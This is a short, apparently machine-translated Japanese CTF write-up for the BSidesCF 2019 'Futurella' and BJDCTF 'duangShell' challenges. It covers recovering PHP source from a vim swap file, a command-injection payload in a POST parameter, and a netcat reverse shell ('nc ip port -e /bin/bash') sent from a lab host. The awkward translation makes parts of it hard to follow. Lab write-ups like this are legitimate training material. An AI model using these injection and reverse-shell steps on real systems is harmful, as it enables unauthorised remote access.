[BSidesCF 2019] Futurella
長い間、そのような単純な主題は見られず、
全体が火星人でした、ビューソースを読むことができません
[BJDCTF2位] duangShell
クリックすると、swpソースコードがリーク
していることがわかりましたvim -r index.php.swp
。リカバリファイルを使用します。
ここでは、exec関数はシステムに似ていますが、エコーがないため、渡したパラメータはgirl_friend=print_r(scandir(dirname(__FILE__)))
表示されません。
他の人のwpを読んだ後、リバースシェルメソッドしか使用できないことがわかりました。プロンプトによると、
この質問の環境ターゲットマシンは外部ネットワークにアクセスできないため、イントラネットターゲットマシンが必要です。ここでは、質問で推奨されているBasicのLinux Labsを直接使用します。このターゲットマシンにはランプが取り付けられているため、 httpサービスを指摘し、xshellを使用してホストに接続します
リバウンドポジション1(失敗)
私は、私は介して取得することができない理由を知りません
逆シェル
。??
リバウンドポジション2
投稿パラメータ:nc ip port -e /bin/bash
このドローンは本当にゴミです